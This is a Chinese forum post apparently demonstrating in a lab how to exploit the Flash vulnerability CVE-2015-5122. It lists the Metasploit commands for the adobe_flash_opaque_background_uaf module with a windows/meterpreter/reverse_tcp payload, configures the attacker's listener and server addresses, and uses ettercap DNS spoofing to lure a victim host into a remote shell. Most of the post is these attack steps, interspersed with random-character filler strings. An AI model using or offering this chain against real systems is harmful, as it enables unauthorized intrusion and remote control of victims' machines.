cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

+ G3 ~8 Z0 x+ x/ Y" t 二、cve2015-5122漏洞实例演示虚拟机 ( ], K6 c) C8 s: l8 M+ d" x5 }0 n' v

{8 U* D, p* ~9 h) Z2 i3 w 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 0 w8 {! n, l# M; |; r5 [

' x# H' t( e" V! L" b9 B& ]0 A search cve-2015-5122如图： / K- O( y8 S+ s- v& e, N2 y7 O5 y

1 V! R! d# E" D* A , W9 W+ i/ r' I

' ?' I7 R3 y2 {" m8 n 下面我们敲如下命令： ' _' n8 T5 y+ p+ M

: R0 k( O2 ]5 d9 \4 D; b; n3 H9 ` use exploit/multi/browser/adobe_flash_opaque_background_uaf ) V- {8 o7 P2 n8 r; v/ H% `- G( V

4 Y- |6 J' n" @, q7 H! \' K7 y set PAYLOAD windows/meterpreter/reverse_tcp & n& X. i: X& O. G- l% E

, ^' ~+ f5 i* b1 {) ^- |2 T% V set LHOST 192.168.0.109 5 Z9 l7 J: l% B5 }- Z- b

7 \# G1 _/ R7 w! `0 g, I8 G set URIPATH / /*根目录*/ / \2 `1 r v( z% Y

) I' e: n6 c" Q) n2 v set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 Y" S$ E- T: b5 x& f7 H& N# r& C4 d

+ {, X6 K4 Q+ O: P+ H set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 6 m3 }& m+ V* G

Y( y8 X7 A0 p 然后show options如图： + n, [2 k" h) q: B+ b

* Q2 T. c+ u1 N6 d/ W6 ^5 d , o$ l' P. i& @+ R) i) ]

% Z. L" v& z, ~ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
# v$ i, [) Q& V7 y7 Y. U ) u- S& O8 X, j6 u

1 |; _! C# @ d! ], X 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 + {2 {. g4 V2 }" S. |% b

# |+ O/ Q" f0 |/ A/ R. \7 C Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 1 A8 @& S: o3 J" {' z2 u7 E4 X

; C% j& `8 c0 `; V9 ?% B4 u3 H ! Z3 f. P: t+ x7 N; H6 S. d6 T6 |

' E1 U8 H# o- p1 V0 ~) g8 d 成功了，这时候我们断开ettercap，如图： ; M, M: D0 v. u2 d% i% K; _' l" W

/ R" g' `2 Z! R# z + W0 G/ | f, w7 l- @

0 v" D0 I. z0 Y$ Z, x Screenshot如图： N0 S* G+ W4 b* ^0 t+ A

1 y8 L- E1 {1 V2 v$ w- d* O " D+ {: w0 X8 y5 T

. {7 T9 x' h; J+ D7 v, h3 }9 l

		自动登录	找回密码
密码			立即注册